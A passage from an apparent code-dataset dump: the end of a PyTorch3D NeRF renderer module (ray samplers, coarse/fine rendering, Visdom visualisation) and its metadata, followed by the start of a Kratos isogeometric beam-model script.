Hence, it does not\n    take cameras as input.\n    \"\"\"\n\n    def __init__(\n        self,\n        n_pts_per_ray: int,\n        stratified: bool,\n        stratified_test: bool,\n        add_input_samples: bool = True,\n    ):\n        \"\"\"\n        Args:\n            n_pts_per_ray: The number of points to sample along each ray.\n            stratified: If `True`, the input `ray_weights` are assumed to be\n                sampled at equidistant intervals.\n            stratified_test: Same as `stratified` with the difference that this\n                setting is applied when the module is in the `eval` mode\n                (`self.training==False`).\n            add_input_samples: Concatenates and returns the sampled values\n                together with the input samples.\n        \"\"\"\n        super().__init__()\n        self._n_pts_per_ray = n_pts_per_ray\n        self._stratified = stratified\n        self._stratified_test = stratified_test\n        self._add_input_samples = add_input_samples\n\n    def forward(\n        self,\n        input_ray_bundle: RayBundle,\n        ray_weights: torch.Tensor,\n        **kwargs,\n    ) -> RayBundle:\n        \"\"\"\n        Args:\n            input_ray_bundle: An instance of `RayBundle` specifying the\n                source rays for sampling of the probability distribution.\n            ray_weights: A tensor of shape\n                `(..., input_ray_bundle.lengths.shape[-1])` with non-negative\n                elements defining the probability distribution to sample\n                ray points from.\n\n        Returns:\n            ray_bundle: A new `RayBundle` instance containing the input ray\n                points together with `n_pts_per_ray` additional sampled\n                points per ray.\n        \"\"\"\n\n        # Calculate the mid-points between the ray depths.\n        z_vals = input_ray_bundle.lengths\n        batch_size = z_vals.shape[0]\n\n        # Carry out the importance sampling.\n        with torch.no_grad():\n            z_vals_mid = 0.5 * (z_vals[..., 1:] + z_vals[..., :-1])\n            z_samples = sample_pdf(\n                z_vals_mid.view(-1, z_vals_mid.shape[-1]),\n                ray_weights.view(-1, ray_weights.shape[-1])[..., 1:-1],\n                self._n_pts_per_ray,\n                det=not (\n                    (self._stratified and self.training)\n                    or (self._stratified_test and not self.training)\n                ),\n            ).view(batch_size, z_vals.shape[1], self._n_pts_per_ray)\n\n        if self._add_input_samples:\n            # Add the new samples to the input ones.\n            z_vals = torch.cat((z_vals, z_samples), dim=-1)\n        else:\n            z_vals = z_samples\n        # Resort by depth.\n        z_vals, _ = torch.sort(z_vals, dim=-1)\n\n        return RayBundle(\n            origins=input_ray_bundle.origins,\n            directions=input_ray_bundle.directions,\n            lengths=z_vals,\n            xys=input_ray_bundle.xys,\n        )\n\n\nclass NeRFRaysampler(torch.nn.Module):\n    \"\"\"\n    Implements the raysampler of NeRF.\n\n    Depending on the `self.training` flag, the raysampler either samples\n    a chunk of random rays (`self.training==True`), or returns a subset of rays\n    of the full image grid (`self.training==False`).\n    The chunking of rays allows for efficient evaluation of the NeRF implicit\n    surface function without encountering out-of-GPU-memory errors.\n\n    Additionally, this raysampler supports pre-caching of the ray bundles\n    for a set of input cameras (`self.precache_rays`).\n    Pre-caching the rays before training greatly speeds-up the ensuing\n    raysampling step of the training NeRF iterations.\n    \"\"\"\n\n    def __init__(\n        self,\n        n_pts_per_ray: int,\n        min_depth: float,\n        max_depth: float,\n        n_rays_per_image: int,\n        image_width: int,\n        image_height: int,\n        stratified: bool = False,\n        stratified_test: bool = False,\n    ):\n        \"\"\"\n        Args:\n            n_pts_per_ray: The number of points sampled along each ray.\n            min_depth: The minimum depth of a ray-point.\n            max_depth: The maximum depth of a ray-point.\n            n_rays_per_image: Number of Monte Carlo ray samples when training\n                (`self.training==True`).\n            image_width: The horizontal size of 
the image grid.\n image_height: The vertical size of the image grid.\n stratified: If `True`, stratifies (=randomly offsets) the depths\n of each ray point during training (`self.training==True`).\n stratified_test: If `True`, stratifies (=randomly offsets) the depths\n of each ray point during evaluation (`self.training==False`).\n \"\"\"\n\n super().__init__()\n self._stratified = stratified\n self._stratified_test = stratified_test\n\n # Initialize the grid ray sampler.\n self._grid_raysampler = NDCGridRaysampler(\n image_width=image_width,\n image_height=image_height,\n n_pts_per_ray=n_pts_per_ray,\n min_depth=min_depth,\n max_depth=max_depth,\n )\n\n # Initialize the Monte Carlo ray sampler.\n self._mc_raysampler = MonteCarloRaysampler(\n min_x=-1.0,\n max_x=1.0,\n min_y=-1.0,\n max_y=1.0,\n n_rays_per_image=n_rays_per_image,\n n_pts_per_ray=n_pts_per_ray,\n min_depth=min_depth,\n max_depth=max_depth,\n )\n\n # create empty ray cache\n self._ray_cache = {}\n\n def get_n_chunks(self, chunksize: int, batch_size: int):\n \"\"\"\n Returns the total number of `chunksize`-sized chunks\n of the raysampler's rays.\n\n Args:\n chunksize: The number of rays per chunk.\n batch_size: The size of the batch of the raysampler.\n\n Returns:\n n_chunks: The total number of chunks.\n \"\"\"\n return int(\n math.ceil(\n (self._grid_raysampler._xy_grid.numel() * 0.5 * batch_size) / chunksize\n )\n )\n\n def _print_precaching_progress(self, i, total, bar_len=30):\n \"\"\"\n Print a progress bar for ray precaching.\n \"\"\"\n position = round((i + 1) / total * bar_len)\n pbar = \"[\" + \"█\" * position + \" \" * (bar_len - position) + \"]\"\n print(pbar, end=\"\\r\")\n\n def precache_rays(self, cameras: List[CamerasBase], camera_hashes: List):\n \"\"\"\n Precaches the rays emitted from the list of cameras `cameras`,\n where each camera is uniquely identified with the corresponding hash\n from `camera_hashes`.\n\n The cached rays are moved to cpu and stored in `self._ray_cache`.\n Raises `ValueError` when caching two cameras with the same hash.\n\n Args:\n cameras: A list of `N` cameras for which the rays are pre-cached.\n camera_hashes: A list of `N` unique identifiers of each\n camera from `cameras`.\n \"\"\"\n print(f\"Precaching {len(cameras)} ray bundles ...\")\n full_chunksize = (\n self._grid_raysampler._xy_grid.numel()\n // 2\n * self._grid_raysampler._n_pts_per_ray\n )\n if self.get_n_chunks(full_chunksize, 1) != 1:\n raise ValueError(\"There has to be one chunk for precaching rays!\")\n for camera_i, (camera, camera_hash) in enumerate(zip(cameras, camera_hashes)):\n ray_bundle = self.forward(\n camera,\n caching=True,\n chunksize=full_chunksize,\n )\n if camera_hash in self._ray_cache:\n raise ValueError(\"There are redundant cameras!\")\n self._ray_cache[camera_hash] = RayBundle(\n *[v.to(\"cpu\").detach() for v in ray_bundle]\n )\n self._print_precaching_progress(camera_i, len(cameras))\n print(\"\")\n\n def _stratify_ray_bundle(self, ray_bundle: RayBundle):\n \"\"\"\n Stratifies the lengths of the input `ray_bundle`.\n\n More specifically, the stratification replaces each ray points' depth `z`\n with a sample from a uniform random distribution on\n `[z - delta_depth, z+delta_depth]`, where `delta_depth` is the difference\n of depths of the consecutive ray depth values.\n\n Args:\n `ray_bundle`: The input `RayBundle`.\n\n Returns:\n `stratified_ray_bundle`: `ray_bundle` whose `lengths` field is replaced\n with the stratified samples.\n \"\"\"\n z_vals = ray_bundle.lengths\n # Get intervals 
between samples.\n mids = 0.5 * (z_vals[..., 1:] + z_vals[..., :-1])\n upper = torch.cat((mids, z_vals[..., -1:]), dim=-1)\n lower = torch.cat((z_vals[..., :1], mids), dim=-1)\n # Stratified samples in those intervals.\n z_vals = lower + (upper - lower) * torch.rand_like(lower)\n return ray_bundle._replace(lengths=z_vals)\n\n def _normalize_raybundle(self, ray_bundle: RayBundle):\n \"\"\"\n Normalizes the ray directions of the input `RayBundle` to unit norm.\n \"\"\"\n ray_bundle = ray_bundle._replace(\n directions=torch.nn.functional.normalize(ray_bundle.directions, dim=-1)\n )\n return ray_bundle\n\n def forward(\n self,\n cameras: CamerasBase,\n chunksize: int = None,\n chunk_idx: int = 0,\n camera_hash: str = None,\n caching: bool = False,\n **kwargs,\n ) -> RayBundle:\n \"\"\"\n Args:\n cameras: A batch of `batch_size` cameras from which the rays are emitted.\n chunksize: The number of rays per chunk.\n Active only when `self.training==False`.\n chunk_idx: The index of the ray chunk. The number has to be in\n `[0, self.get_n_chunks(chunksize, batch_size)-1]`.\n Active only when `self.training==False`.\n camera_hash: A unique identifier of a pre-cached camera. If `None`,\n the cache is not searched and the rays are calculated from scratch.\n caching: If `True`, activates the caching mode that returns the `RayBundle`\n that should be stored into the cache.\n Returns:\n A named tuple `RayBundle` with the following fields:\n origins: A tensor of shape\n `(batch_size, n_rays_per_image, 3)`\n denoting the locations of ray origins in the world coordinates.\n directions: A tensor of shape\n `(batch_size, n_rays_per_image, 3)`\n denoting the directions of each ray in the world coordinates.\n lengths: A tensor of shape\n `(batch_size, n_rays_per_image, n_pts_per_ray)`\n containing the z-coordinate (=depth) of each ray in world units.\n xys: A tensor of shape\n `(batch_size, n_rays_per_image, 2)`\n containing the 2D image coordinates of each ray.\n \"\"\"\n\n batch_size = cameras.R.shape[0] # pyre-ignore\n device = cameras.device\n\n if (camera_hash is None) and (not caching) and self.training:\n # Sample random rays from scratch.\n ray_bundle = self._mc_raysampler(cameras)\n ray_bundle = self._normalize_raybundle(ray_bundle)\n else:\n if camera_hash is not None:\n # The case where we retrieve a camera from cache.\n if batch_size != 1:\n raise NotImplementedError(\n \"Ray caching works only for batches with a single camera!\"\n )\n full_ray_bundle = self._ray_cache[camera_hash]\n else:\n # We generate a full ray grid from scratch.\n full_ray_bundle = self._grid_raysampler(cameras)\n full_ray_bundle = self._normalize_raybundle(full_ray_bundle)\n\n n_pixels = full_ray_bundle.directions.shape[:-1].numel()\n\n if self.training:\n # During training we randomly subsample rays.\n sel_rays = torch.randperm(n_pixels, device=device)[\n : self._mc_raysampler._n_rays_per_image\n ]\n else:\n # In case we test, we take only the requested chunk.\n if chunksize is None:\n chunksize = n_pixels * batch_size\n start = chunk_idx * chunksize * batch_size\n end = min(start + chunksize, n_pixels)\n sel_rays = torch.arange(\n start,\n end,\n dtype=torch.long,\n device=full_ray_bundle.lengths.device,\n )\n\n # Take the \"sel_rays\" rays from the full ray bundle.\n ray_bundle = RayBundle(\n *[\n v.view(n_pixels, -1)[sel_rays]\n .view(batch_size, sel_rays.numel() // batch_size, -1)\n .to(device)\n for v in full_ray_bundle\n ]\n )\n\n if (\n (self._stratified and self.training)\n or (self._stratified_test and not 
self.training)\n ) and not caching: # Make sure not to stratify when caching!\n ray_bundle = self._stratify_ray_bundle(ray_bundle)\n\n return ray_bundle\n\n\nclass RadianceFieldRenderer(torch.nn.Module):\n \"\"\"\n Implements a renderer of a Neural Radiance Field.\n\n This class holds pointers to the fine and coarse renderer objects, which are\n instances of `pytorch3d.renderer.ImplicitRenderer`, and pointers to the\n neural networks representing the fine and coarse Neural Radiance Fields,\n which are instances of `NeuralRadianceField`.\n\n The rendering forward pass proceeds as follows:\n 1) For a given input camera, rendering rays are generated with the\n `NeRFRaysampler` object of `self._renderer['coarse']`.\n In the training mode (`self.training==True`), the rays are a set\n of `n_rays_per_image` random 2D locations of the image grid.\n In the evaluation mode (`self.training==False`), the rays correspond\n to the full image grid. The rays are further split to\n `chunk_size_test`-sized chunks to prevent out-of-memory errors.\n 2) For each ray point, the coarse `NeuralRadianceField` MLP is evaluated.\n The pointer to this MLP is stored in `self._implicit_function['coarse']`\n 3) The coarse radiance field is rendered with the\n `EmissionAbsorptionNeRFRaymarcher` object of `self._renderer['coarse']`.\n 4) The coarse raymarcher outputs a probability distribution that guides\n the importance raysampling of the fine rendering pass. The\n `ProbabilisticRaysampler` stored in `self._renderer['fine'].raysampler`\n implements the importance ray-sampling.\n 5) Similar to 2) the fine MLP in `self._implicit_function['fine']`\n labels the ray points with occupancies and colors.\n 6) self._renderer['fine'].raymarcher` generates the final fine render.\n 7) The fine and coarse renders are compared to the ground truth input image\n with PSNR and MSE metrics.\n \"\"\"\n\n def __init__(\n self,\n image_size: Tuple[int, int],\n n_pts_per_ray: int,\n n_pts_per_ray_fine: int,\n n_rays_per_image: int,\n min_depth: float,\n max_depth: float,\n stratified: bool,\n stratified_test: bool,\n chunk_size_test: int,\n n_harmonic_functions_xyz: int = 6,\n n_harmonic_functions_dir: int = 4,\n n_hidden_neurons_xyz: int = 256,\n n_hidden_neurons_dir: int = 128,\n n_layers_xyz: int = 8,\n append_xyz: Tuple[int] = (5,),\n density_noise_std: float = 0.0,\n visualization: bool = False,\n ):\n \"\"\"\n Args:\n image_size: The size of the rendered image (`[height, width]`).\n n_pts_per_ray: The number of points sampled along each ray for the\n coarse rendering pass.\n n_pts_per_ray_fine: The number of points sampled along each ray for the\n fine rendering pass.\n n_rays_per_image: Number of Monte Carlo ray samples when training\n (`self.training==True`).\n min_depth: The minimum depth of a sampled ray-point for the coarse rendering.\n max_depth: The maximum depth of a sampled ray-point for the coarse rendering.\n stratified: If `True`, stratifies (=randomly offsets) the depths\n of each ray point during training (`self.training==True`).\n stratified_test: If `True`, stratifies (=randomly offsets) the depths\n of each ray point during evaluation (`self.training==False`).\n chunk_size_test: The number of rays in each chunk of image rays.\n Active only when `self.training==True`.\n n_harmonic_functions_xyz: The number of harmonic functions\n used to form the harmonic embedding of 3D point locations.\n n_harmonic_functions_dir: The number of harmonic functions\n used to form the harmonic embedding of the ray directions.\n 
n_hidden_neurons_xyz: The number of hidden units in the\n fully connected layers of the MLP that accepts the 3D point\n locations and outputs the occupancy field with the intermediate\n features.\n n_hidden_neurons_dir: The number of hidden units in the\n fully connected layers of the MLP that accepts the intermediate\n features and ray directions and outputs the radiance field\n (per-point colors).\n n_layers_xyz: The number of layers of the MLP that outputs the\n occupancy field.\n append_xyz: The list of indices of the skip layers of the occupancy MLP.\n Prior to evaluating the skip layers, the tensor which was input to MLP\n is appended to the skip layer input.\n density_noise_std: The standard deviation of the random normal noise\n added to the output of the occupancy MLP.\n Active only when `self.training==True`.\n visualization: whether to store extra output for visualization.\n \"\"\"\n\n super().__init__()\n\n # The renderers and implicit functions are stored under the fine/coarse\n # keys in ModuleDict PyTorch modules.\n self._renderer = torch.nn.ModuleDict()\n self._implicit_function = torch.nn.ModuleDict()\n\n # Init the EA raymarcher used by both passes.\n raymarcher = EmissionAbsorptionNeRFRaymarcher()\n\n # Parse out image dimensions.\n image_height, image_width = image_size\n\n for render_pass in (\"coarse\", \"fine\"):\n if render_pass == \"coarse\":\n # Initialize the coarse raysampler.\n raysampler = NeRFRaysampler(\n n_pts_per_ray=n_pts_per_ray,\n min_depth=min_depth,\n max_depth=max_depth,\n stratified=stratified,\n stratified_test=stratified_test,\n n_rays_per_image=n_rays_per_image,\n image_height=image_height,\n image_width=image_width,\n )\n elif render_pass == \"fine\":\n # Initialize the fine raysampler.\n raysampler = ProbabilisticRaysampler(\n n_pts_per_ray=n_pts_per_ray_fine,\n stratified=stratified,\n stratified_test=stratified_test,\n )\n else:\n raise ValueError(f\"No such rendering pass {render_pass}\")\n\n # Initialize the fine/coarse renderer.\n self._renderer[render_pass] = ImplicitRenderer(\n raysampler=raysampler,\n raymarcher=raymarcher,\n )\n\n # Instantiate the fine/coarse NeuralRadianceField module.\n self._implicit_function[render_pass] = NeuralRadianceField(\n n_harmonic_functions_xyz=n_harmonic_functions_xyz,\n n_harmonic_functions_dir=n_harmonic_functions_dir,\n n_hidden_neurons_xyz=n_hidden_neurons_xyz,\n n_hidden_neurons_dir=n_hidden_neurons_dir,\n n_layers_xyz=n_layers_xyz,\n append_xyz=append_xyz,\n )\n\n self._density_noise_std = density_noise_std\n self._chunk_size_test = chunk_size_test\n self._image_size = image_size\n self.visualization = visualization\n\n def precache_rays(\n self,\n cache_cameras: List[CamerasBase],\n cache_camera_hashes: List[str],\n ):\n \"\"\"\n Precaches the rays emitted from the list of cameras `cache_cameras`,\n where each camera is uniquely identified with the corresponding hash\n from `cache_camera_hashes`.\n\n The cached rays are moved to cpu and stored in\n `self._renderer['coarse']._ray_cache`.\n\n Raises `ValueError` when caching two cameras with the same hash.\n\n Args:\n cache_cameras: A list of `N` cameras for which the rays are pre-cached.\n cache_camera_hashes: A list of `N` unique identifiers for each\n camera from `cameras`.\n \"\"\"\n self._renderer[\"coarse\"].raysampler.precache_rays(\n cache_cameras,\n cache_camera_hashes,\n )\n\n def _process_ray_chunk(\n self,\n camera_hash: Optional[str],\n camera: CamerasBase,\n image: torch.Tensor,\n chunk_idx: int,\n ) -> dict:\n \"\"\"\n Samples and 
renders a chunk of rays.\n\n Args:\n camera_hash: A unique identifier of a pre-cached camera.\n If `None`, the cache is not searched and the sampled rays are\n calculated from scratch.\n camera: A batch of cameras from which the scene is rendered.\n image: A batch of corresponding ground truth images of shape\n ('batch_size', ·, ·, 3).\n chunk_idx: The index of the currently rendered ray chunk.\n Returns:\n out: `dict` containing the outputs of the rendering:\n `rgb_coarse`: The result of the coarse rendering pass.\n `rgb_fine`: The result of the fine rendering pass.\n `rgb_gt`: The corresponding ground-truth RGB values.\n \"\"\"\n # Initialize the outputs of the coarse rendering to None.\n coarse_ray_bundle = None\n coarse_weights = None\n\n # First evaluate the coarse rendering pass, then the fine one.\n for renderer_pass in (\"coarse\", \"fine\"):\n (rgb, weights), ray_bundle_out = self._renderer[renderer_pass](\n cameras=camera,\n volumetric_function=self._implicit_function[renderer_pass],\n chunksize=self._chunk_size_test,\n chunk_idx=chunk_idx,\n density_noise_std=(self._density_noise_std if self.training else 0.0),\n input_ray_bundle=coarse_ray_bundle,\n ray_weights=coarse_weights,\n camera_hash=camera_hash,\n )\n\n if renderer_pass == \"coarse\":\n rgb_coarse = rgb\n # Store the weights and the rays of the first rendering pass\n # for the ensuing importance ray-sampling of the fine render.\n coarse_ray_bundle = ray_bundle_out\n coarse_weights = weights\n if image is not None:\n # Sample the ground truth images at the xy locations of the\n # rendering ray pixels.\n rgb_gt = sample_images_at_mc_locs(\n image[..., :3][None],\n ray_bundle_out.xys,\n )\n else:\n rgb_gt = None\n\n elif renderer_pass == \"fine\":\n rgb_fine = rgb\n\n else:\n raise ValueError(f\"No such rendering pass {renderer_pass}\")\n\n out = {\"rgb_fine\": rgb_fine, \"rgb_coarse\": rgb_coarse, \"rgb_gt\": rgb_gt}\n if self.visualization:\n # Store the coarse rays/weights only for visualization purposes.\n out[\"coarse_ray_bundle\"] = type(coarse_ray_bundle)(\n *[v.detach().cpu() for k, v in coarse_ray_bundle._asdict().items()]\n )\n out[\"coarse_weights\"] = coarse_weights.detach().cpu()\n\n return out\n\n def forward(\n self,\n camera_hash: Optional[str],\n camera: CamerasBase,\n image: torch.Tensor,\n ) -> Tuple[dict, dict]:\n \"\"\"\n Performs the coarse and fine rendering passes of the radiance field\n from the viewpoint of the input `camera`.\n Afterwards, both renders are compared to the input ground truth `image`\n by evaluating the peak signal-to-noise ratio and the mean-squared error.\n\n The rendering result depends on the `self.training` flag:\n - In the training mode (`self.training==True`), the function renders\n a random subset of image rays (Monte Carlo rendering).\n - In evaluation mode (`self.training==False`), the function renders\n the full image. 
In order to prevent out-of-memory errors,\n when `self.training==False`, the rays are sampled and rendered\n in batches of size `chunksize`.\n\n Args:\n camera_hash: A unique identifier of a pre-cached camera.\n If `None`, the cache is not searched and the sampled rays are\n calculated from scratch.\n camera: A batch of cameras from which the scene is rendered.\n image: A batch of corresponding ground truth images of shape\n ('batch_size', ·, ·, 3).\n Returns:\n out: `dict` containing the outputs of the rendering:\n `rgb_coarse`: The result of the coarse rendering pass.\n `rgb_fine`: The result of the fine rendering pass.\n `rgb_gt`: The corresponding ground-truth RGB values.\n\n The shape of `rgb_coarse`, `rgb_fine`, `rgb_gt` depends on the\n `self.training` flag:\n If `==True`, all 3 tensors are of shape\n `(batch_size, n_rays_per_image, 3)` and contain the result\n of the Monte Carlo training rendering pass.\n If `==False`, all 3 tensors are of shape\n `(batch_size, image_size[0], image_size[1], 3)` and contain\n the result of the full image rendering pass.\n metrics: `dict` containing the error metrics comparing the fine and\n coarse renders to the ground truth:\n `mse_coarse`: Mean-squared error between the coarse render and\n the input `image`\n `mse_fine`: Mean-squared error between the fine render and\n the input `image`\n `psnr_coarse`: Peak signal-to-noise ratio between the coarse render and\n the input `image`\n `psnr_fine`: Peak signal-to-noise ratio between the fine render and\n the input `image`\n \"\"\"\n if not self.training:\n # Full evaluation pass.\n n_chunks = self._renderer[\"coarse\"].raysampler.get_n_chunks(\n self._chunk_size_test,\n camera.R.shape[0],\n )\n else:\n # MonteCarlo ray sampling.\n n_chunks = 1\n\n # Process the chunks of rays.\n chunk_outputs = [\n self._process_ray_chunk(\n camera_hash,\n camera,\n image,\n chunk_idx,\n )\n for chunk_idx in range(n_chunks)\n ]\n\n if not self.training:\n # For a full render pass concatenate the output chunks,\n # and reshape to image size.\n out = {\n k: torch.cat(\n [ch_o[k] for ch_o in chunk_outputs],\n dim=1,\n ).view(-1, *self._image_size, 3)\n if chunk_outputs[0][k] is not None\n else None\n for k in (\"rgb_fine\", \"rgb_coarse\", \"rgb_gt\")\n }\n else:\n out = chunk_outputs[0]\n\n # Calc the error metrics.\n metrics = {}\n if image is not None:\n for render_pass in (\"coarse\", \"fine\"):\n for metric_name, metric_fun in zip(\n (\"mse\", \"psnr\"), (calc_mse, calc_psnr)\n ):\n metrics[f\"{metric_name}_{render_pass}\"] = metric_fun(\n out[\"rgb_\" + render_pass][..., :3],\n out[\"rgb_gt\"][..., :3],\n )\n\n return out, metrics\n\n\ndef visualize_nerf_outputs(\n nerf_out: dict, output_cache: List, viz: Visdom, visdom_env: str\n):\n \"\"\"\n Visualizes the outputs of the `RadianceFieldRenderer`.\n\n Args:\n nerf_out: An output of the validation rendering pass.\n output_cache: A list with outputs of several training render passes.\n viz: A visdom connection object.\n visdom_env: The name of visdom environment for visualization.\n \"\"\"\n\n # Show the training images.\n ims = torch.stack([o[\"image\"] for o in output_cache])\n ims = torch.cat(list(ims), dim=1)\n viz.image(\n ims.permute(2, 0, 1),\n env=visdom_env,\n win=\"images\",\n opts={\"title\": \"train_images\"},\n )\n\n # Show the coarse and fine renders together with the ground truth images.\n ims_full = torch.cat(\n [\n nerf_out[imvar][0].permute(2, 0, 1).detach().cpu().clamp(0.0, 1.0)\n for imvar in (\"rgb_coarse\", \"rgb_fine\", \"rgb_gt\")\n ],\n 
dim=2,\n    )\n    viz.image(\n        ims_full,\n        env=visdom_env,\n        win=\"images_full\",\n        opts={\"title\": \"coarse | fine | target\"},\n    )\n\n    # Make a 3D plot of training cameras and their emitted rays.\n    camera_trace = {\n        f\"camera_{ci:03d}\": o[\"camera\"].cpu() for ci, o in enumerate(output_cache)\n    }\n    ray_pts_trace = {\n        f\"ray_pts_{ci:03d}\": Pointclouds(\n            ray_bundle_to_ray_points(o[\"coarse_ray_bundle\"])\n            .detach()\n            .cpu()\n            .view(1, -1, 3)\n        )\n        for ci, o in enumerate(output_cache)\n    }\n    plotly_plot = plot_scene(\n        {\n            \"training_scene\": {\n                **camera_trace,\n                **ray_pts_trace,\n            },\n        },\n        pointcloud_max_points=5000,\n        pointcloud_marker_size=1,\n        camera_scale=0.3,\n    )\n    viz.plotlyplot(plotly_plot, env=visdom_env, win=\"scenes\")","repo_name":"wesbz/pytorch3d-nerf","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":50749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17451698191","text":"from KratosMultiphysics import *\nfrom KratosMultiphysics.IgaApplication import *\nfrom KratosMultiphysics.StructuralMechanicsApplication import *\nimport new_linear_solver_factory\nimport ANurbsDev as an\nimport numpy as np\nfrom scipy import integrate\nimport yaml\nimport json\nimport pandas as pd\n\n\ndef normalized(v):\n    return v / np.linalg.norm(v)\n\ndef normalized_1(v, v_1):\n    return v_1 / np.linalg.norm(v) - np.dot(v, v_1) * v / np.linalg.norm(v)**3\n\ndef cross_1(u, u_1, v, v_1):\n    return np.cross(u, v_1) + np.cross(u_1, v)\n\ndef cross_v_identity(v):\n    return np.array([[0.0, -v[2], v[1]], [v[2], 0.0, -v[0]], [-v[1], v[0], 0.0]])\n\ndef compute_rod(v, phi):\n    return np.cos(phi) * np.eye(3) + cross_v_identity(np.sin(phi) * v)\n\ndef compute_rod_1(v, v_1, phi, phi_1):\n    return np.cos(phi) * phi_1 * cross_v_identity(v) + np.sin(phi) * (cross_v_identity(v_1) - phi_1 * np.eye(3))\n\ndef compute_lam(v1, v2):\n    v1_x_v2 = np.cross(v1, v2)\n    v1_d_v2 = np.dot(v1, v2)\n\n    lam = v1_d_v2 * np.eye(3) + cross_v_identity(v1_x_v2)\n\n    if v1_d_v2 + 1.0 > 1e-7:\n        lam = lam + np.outer(v1_x_v2, v1_x_v2) * 1.0 / (1.0 + v1_d_v2)\n    else:\n        l_v1_x_v2 = np.linalg.norm(v1_x_v2)\n\n        e_hat = v1_x_v2\n\n        if l_v1_x_v2 > 1e-7:\n            e_hat = e_hat / l_v1_x_v2\n        lam = lam + np.outer(e_hat, e_hat) * (1 - v1_d_v2)\n\n    return lam\n\ndef compute_lam_1(v1, v1_1, v2, v2_1):\n    T0_T = np.dot(v1, v2)\n    T0_T_1 = np.dot(v1, v2_1) + np.dot(v1_1, v2)\n    T0xT = np.cross(v1, v2)\n    T0xT_1 = np.cross(v1, v2_1) + np.cross(v1_1, v2)\n\n    d = 1.0 / (1.0 + T0_T)\n\n    o = np.outer(T0xT_1, T0xT) + np.outer(T0xT, T0xT_1)\n\n    return T0_T_1 * np.eye(3) + cross_v_identity(T0xT_1) - T0_T_1 * np.power(d, 2) * np.outer(T0xT, T0xT) + d * o\n\n\nclass Model:\n    def __init__(self, geometry):\n        # create the model\n        model_part = ModelPart('Model')\n\n        # define the variables that every node must store\n        model_part.AddNodalSolutionStepVariable(DISPLACEMENT)\n        model_part.AddNodalSolutionStepVariable(DISPLACEMENT_ROTATION)\n        model_part.AddNodalSolutionStepVariable(REACTION)\n        model_part.AddNodalSolutionStepVariable(REACTION_ROTATION)\n        model_part.AddNodalSolutionStepVariable(POINT_LOAD)\n\n        self.model_part = model_part\n\n        self.nodes = []\n        self._node_keys = {}\n\n        self.beams = []\n        self._beam_keys = {}\n\n        self.properties = []\n        self._property_keys = {}\n\n        self.elements = []\n        self._element_keys = {}\n\n        self._time_step = 0\n\n        self.geometry = geometry\n\n        self.penalty = []\n        self.penalty_key = {}\n\n        self.update_conditions = []\n\n    def add_node(self, key, location):\n        
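# Each node carries three translational DOFs plus one scalar rotation DOF used by the beam formulation.\n        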
node_id = len(self.nodes) + 1\n        node = self.model_part.CreateNewNode(node_id, *location)\n        node.AddDof(DISPLACEMENT_X, REACTION_X)\n        node.AddDof(DISPLACEMENT_Y, REACTION_Y)\n        node.AddDof(DISPLACEMENT_Z, REACTION_Z)\n        node.AddDof(DISPLACEMENT_ROTATION, REACTION_ROTATION)\n        self.nodes.append(node)\n        self._node_keys[key] = node\n        return node\n\n    def node(self, key):\n        return self._node_keys[key]\n\n    def add_beam(self, curve_geometry_ptr):\n        beam = Beam(self, curve_geometry_ptr)\n        self.beams.append(beam)\n        self._beam_keys[beam.key] = beam\n\n    def beam(self, key):\n        return self._beam_keys[f'{key}.CurveGeometry3D']\n\n    def add_properties(self, key=None):\n        property_id = len(self.properties) + 1\n\n        property = self.model_part.GetProperties()[property_id]\n\n        self.properties.append(property)\n\n        if key is not None:\n            self._property_keys[key] = property\n\n    def add_beam_properties(self, key, area, it, iy, iz, youngs_modulus, shear_modulus):\n        property_id = len(self.properties) + 1\n\n        property = self.model_part.GetProperties()[property_id]\n        property.SetValue(CROSS_AREA, area)                 # m²\n        property.SetValue(MOMENT_OF_INERTIA_T, it)          # m4\n        property.SetValue(MOMENT_OF_INERTIA_Y, iy)          # m4\n        property.SetValue(MOMENT_OF_INERTIA_Z, iz)          # m4\n        property.SetValue(YOUNG_MODULUS, youngs_modulus)    # kN/m²\n        property.SetValue(SHEAR_MODULUS, shear_modulus)     # kN/m²\n\n        self.properties.append(property)\n        self._property_keys[key] = property\n\n    def property(self, key):\n        return self._property_keys[key]\n\n    def add_element(self, element_type, nodes, property):\n        element_id = len(self.elements) + 1\n        node_ids = [node.Id for node in nodes]\n        element = self.model_part.CreateNewElement(element_type, element_id, node_ids, property)\n        self.elements.append(element)\n        self._element_keys[element_id] = element\n        return element\n\n    def add_condition(self, condition_type, nodes, property):\n        element_id = len(self.elements) + 1\n        node_ids = [node.Id for node in nodes]\n        element = self.model_part.CreateNewCondition(condition_type, element_id, node_ids, property)\n        self.elements.append(element)\n        self._element_keys[element_id] = element\n        return element\n\n    def init_solver(self):\n        # configure the solver\n        self.model_part.SetBufferSize(1)\n\n        # solution scheme\n        time_scheme = ResidualBasedIncrementalUpdateStaticScheme()\n\n        linear_solver = new_linear_solver_factory.ConstructSolver(Parameters(\n            r'{\"solver_type\": \"eigen_sparse_lu\"}'))\n\n        # convergence criterion\n        relative_tolerance = 1e-09\n        absolute_tolerance = 1e-09\n        # conv_criteria = ResidualCriteria(relative_tolerance, absolute_tolerance)\n        conv_criteria = DisplacementCriteria(relative_tolerance, absolute_tolerance)\n        conv_criteria.SetEchoLevel(1)\n\n        # solver\n        maximum_iterations = 600 #!! 
If the solver performs only one iteration you get a linear solution -> increase the iteration count!\n        compute_reactions = True\n        reform_dofs_at_each_iteration = True\n        move_mesh_flag = True\n\n        self.solver = ResidualBasedNewtonRaphsonStrategy(\n            self.model_part,\n            time_scheme,\n            linear_solver,\n            conv_criteria,\n            maximum_iterations,\n            compute_reactions,\n            reform_dofs_at_each_iteration,\n            move_mesh_flag\n        )\n        self.solver.SetEchoLevel(1)\n\n    def solve(self, lam=1.0):\n        self._time_step += 1\n\n        self.model_part.CloneTimeStep(self._time_step)\n\n        for update_condition in self.update_conditions:\n            update_condition(lam)\n\n        self.solver.Solve()\n\n        self.update()\n\n    def update(self):\n        for beam in self.beams:\n            beam.update(self._time_step)\n\nclass Beam:\n    def __init__(self, model, curve_geometry_ptr):\n\n        self.clear_memory()\n\n        curve_geometry = curve_geometry_ptr.Data()\n\n        nodes = []\n\n        for i, pole in enumerate(curve_geometry.Poles()):\n            node_key = (curve_geometry_ptr.Key(), i)\n\n            node = model.add_node(node_key, location=pole)\n\n            nodes.append(node)\n\n        self.model = model\n        self.curve_geometry_ptr = curve_geometry_ptr\n        self.curve_geometry = curve_geometry\n        self.nodes = nodes\n\n   